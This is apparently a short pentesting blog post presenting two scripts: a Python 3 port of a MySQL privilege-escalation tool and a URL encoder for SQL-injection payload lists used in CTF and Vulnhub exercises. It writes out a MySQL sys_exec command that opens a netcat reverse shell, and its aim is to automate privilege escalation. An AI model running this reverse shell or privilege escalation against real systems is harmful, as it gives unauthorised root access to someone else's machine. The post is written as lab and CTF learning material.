Tools & Scripts

Couple of Python Scripts

I haven’t had as much time as I would have hoped to start on some other projects as I would have liked. But I have uploaded two new scripts to my GitHub (


This is a really useful script but unfortunately I cannot take the credit for this one. I have simply changed a few lines to make it Python 3 compatible. The original author d7x ( did a great job at automating this MySQL privilege escalation (

As you can see there are usually a number of manual steps to complete this privesc. However, if you find yourself in a position where you can use this exploit then simply running this script and passing the MySQL username and password will automate the process.

python3 --username root --password rootPassword

You may or may not have success with the root shell it attempts to open for you. In my experience I had to exit the shell it entered me in and return to the mysql instance before using the following commands to execute commands as root.

select sys_exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 80 >/tmp/f');


What is this script?

This was a quick Python script I put together to URL encode / decode lists.

Why did I create it?

This can have a lot of uses not just in pentesting / CTF exercises. The reason I made this in particular was because I was in a situation where I could not use a tool such as sqlmap to detect sql injection and instead of manually testing everything off my sql injection cheatsheet I could automate it with a tool like wfuzz.

Where have I used it?

I recommend checking out bootlesshackers Insanity Hosting machine on Vulnhub for an example box of where this may be useful.

Using Burp Intruder, you can upload a list and there is a tickbox option to automatically URL encode specific characters under Intruder >> Payloads >> Payload Encoding.

Now if you have the Community version of Burp, using Intruder like this can take a long time especially if you have a large list. It is simple enough to recreate the request for wfuzz (or similar) and use the output of this tool as your input file for wfuzz.


Soon I will be making a post on how to use tools such as wfuzz in order to look for SQL Injection without using a fully automated tool such as sqlmap.

Other ways of doing this?

There are lots of ways / scripts to do this and when you look online there are many encoders / decoders. However, what I found is that they all seem to encode the entire contents into a single line which doesn’t help you if you wanted to use it in an attack like mentioned above.

Anyway I hope someone finds these scripts useful.